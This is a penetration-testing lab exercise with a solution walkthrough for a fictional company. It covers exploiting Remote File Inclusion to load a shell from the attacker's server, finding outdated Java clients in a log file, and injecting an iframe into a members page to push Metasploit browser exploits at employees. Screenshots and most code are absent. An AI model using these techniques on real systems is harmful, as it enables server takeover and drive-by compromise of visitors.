Lab 06.0 - Blind Penetration Test
Lab 06.0 - Blind Penetration Test
LAB ID: 6
1. LAB
You are a Penetration tester and you’re asked to perform a Penetration
test against Foocompany. The organization relies upon Foohosting inc. to
host a dedicated web server on which different organization’s websites
are present. Your goal is to obtain access to the internal target
organization network, meaning you have to exploit one or more internal
machines. You know that the organization website offers a members
area, that is daily browsed by the employees of the organization to
perform different tasks.
2. GOALS
Obtain access to one or more machines of the organization network
4. RECOMMENDED TOOLS
Metasploit
Further information:
o 10.100.0.100 foocompany.com
o 10.100.0.100 members.foocompany.com
--------------------------------------------------------------------------------------------------
Following there is the lab solutions. Be sure to read them only when
you have finished your lab, or if you are stuck.
Solutions
The following is a screenshot of our /etc/hosts file, with the two entries
that will allow us to connect to the organization website:
By adding the previous two lines, we are now able to browse the
organization website:
Indeed if we try to open the following address, we are able to read the
announcement.txt file:
As you can see the page (foocompany.com) has been included. This
means that the server is vulnerable to RFI (Remote File Inclusion).
1) METASPLOIT
Metasploit offers a specific module that allows you to exploit RFI, called
‘php_include’. We need to set the server address, the URL vulnerable to
RFI and the payload to use.
meterpreter >
2) SHELL
An easier way to exploit the server is by using shells.
Note: Lab machines are not connected to internet. We have to provide the shell.
We can create our shell and then store it in the folder ‘/var/www’. Now
we have to start the apache service. We can do it by clicking apache start
in Application->Backtrack->Services->HTTPD:
Shell
Now we have to change the value in the URI in order to let the server
include and load our shell (http://OUR_IP_ADDRESS/shell.txt):
Now that we took control of the server we can start searching for useful
information that can help us reach our goal. Since this is the only
connection between us and the organization network (members area is
browsed by organization employees) , we have to think about how we
can use the server to gain access to the organization machines.
By searching the web server folders, we can find a file named ‘logs.txt’
that could reveal useful information. Indeed opening it, we can see an
history of clients that have connected to the members area, and some
other information.
In the logs.txt file there are different warning that tells us about clients
logins attempts, their browser agent and Java version. As you can see
there are at least two clients (192.168.78.25 and 192.168.78.5) with an
out-of-date Java installed.
By searching Java vulnerabilities, we can see that the two Java versions
are both vulnerable to Java Rhino exploit.
Once again, we know that organization employees, usually log into the
members area. What we can do then, is edit the members webpage, in
order to insert one or more iframes, that will point to our attacker
machine and try to exploit clients vulnerabilities this way.
There are different metasploit modules that we can use to achieve this
goal.
“auxiliary/server/browser_autopwn” and
“exploit/multi/browser/java_rhino”
The first one will use different browser exploits, while the second is more
specific for our environment, since the clients found in the ‘logs.txt’ file
are both vulnerable to this exploit. The reason why we also use the first
one, is that we don’t know if there are other workstations vulnerable to
different exploits. We want to maximize our chances of entering the
corporate network through a client side exploit.
1) BROWSER_AUTOPWN
[*] Setup
[*] Obfuscating initial javascript 2012-04-12 11:04:48 +0200
msf auxiliary(browser_autopwn) > [*] Done in 0.698111897 seconds
2) JAVA_RHINO
In the same way as browser_autopown we have to set the java_rhino
module. Note that there are 2 different machines vulnerable to this
exploit, and they have different OS’s. So we have to set the module
properly (indeed we will leave the TARGET option to 0 - Generic).
Now we have another URL that we can use to exploit the target
organization corporate network.
To do it, we will use the our shell or our metasploit session (download,
edit and then upload the file back).
In this case we will use only the java_rhino exploit, so we add the
following code to the index.php:
-------------------------------------iframe in index.php-----------------------------------
Once the page has been saved, we just have to wait for one of the
vulnerable clients to visit the members page. Indeed after few minutes
the first session has been created (IP: 192.168.78.5):
And right after the previous machine, another one has been exploited
(IP: 192.168.78.25)